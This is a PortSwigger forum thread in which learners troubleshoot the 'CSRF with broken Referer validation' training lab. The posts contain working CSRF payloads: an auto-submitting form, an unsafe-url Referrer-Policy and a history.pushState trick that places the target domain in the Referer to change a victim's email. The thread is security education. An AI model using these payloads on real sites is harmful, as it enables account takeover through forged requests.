Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Can't pass the "CSRF with broken Referer validation" lab even if my solution works

Darius | Last updated: Dec 08, 2023 10:48PM UTC

Lab-URL: https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses/lab-referer-validation-broken I found a solution that works when I tested with `wiener:peter` but it doesn't get accepted when I deliver the exploit to the victim. Steps: 1. In the Exploit Server, set file to /exploit?LAB_URL.web-security-academy.net 2. Add the correct header: Referrer-Policy: unsafe-url 3. Add this body <html> <body> <form action="https://LAB_URL.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="pwned@evil-user.net" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ---- After I store and view the exploit, the email will be changed to "pwned@evil-user.net". But when I deliver the exploit, the solution doesn't get accepted. What should I change? Thank you!

Darius | Last updated: Dec 08, 2023 10:52PM UTC

Update: I looked into the solution and included the `history.pushState` JS and set the exploit file to just "/exploit". The exploit works, but when delivering it, the solution is still not approved.

Dominyque, PortSwigger Agent | Last updated: Dec 11, 2023 10:02AM UTC

Hi Darius I have just tested the lab with the steps you have outlined and can confirm that the lab solves. Are you able to send a screen recording to support@portswigger.net so we can see the exact steps you are taking?

Darius | Last updated: Dec 11, 2023 06:50PM UTC

Hi Dominyque, Thanks for your reply. I just tried again and it was working in the end. Thank you!

Dominyque, PortSwigger Agent | Last updated: Dec 12, 2023 07:34AM UTC

Hi Darius I am glad you were able to solve the lab! :)

Yuyu | Last updated: Jul 29, 2024 05:51PM UTC

HEAD HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Referrer-Policy: unsafe-url BODY <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script> history.pushState("", "", "?/0ae400270447f3468213256900ae00b8.web-security-academy.net"); </script> <form action="https://0ae400270447f3468213256900ae00b8.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="attacker10&#64;test&#46;com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> The view exploit is working but when delivering to the vicitm, it can't solve the lab.Could you advise please?

Dominyque, PortSwigger Agent | Last updated: Jul 30, 2024 08:02AM UTC

Hi Loke, Which browser are you attempting the lab on? The Embedded browser?

James | Last updated: Oct 08, 2024 01:00AM UTC

I cannot get the lab to solve, tried to look up several youtube walkthroughs for it as well that come up with the same results but when I click to deliver it never solves. This is the only lab I have had this issue with. URL: https://exploit-0a79003f04c2fc99cf7181c801f7000a.exploit-server.net/exploit HTTPS: Yes File: /exploit Head: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Referrer-policy: unsafe-url Body: <html> <body> <form action="https://0a97006e0495fce8cf5d8298006800f8.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="test2&#64;exploit&#46;net" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState(", ", '/?0a97006e0495fce8cf5d8298006800f8.web-security-academy.net'); document.forms[0].submit(); </script> </body> </html> Using chrome browser. Thanks

James | Last updated: Oct 08, 2024 01:03AM UTC

Cancel, after making this post I figured out where I made a mistake in history push I had (", ", '/') and I needed ('', '', '/')

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.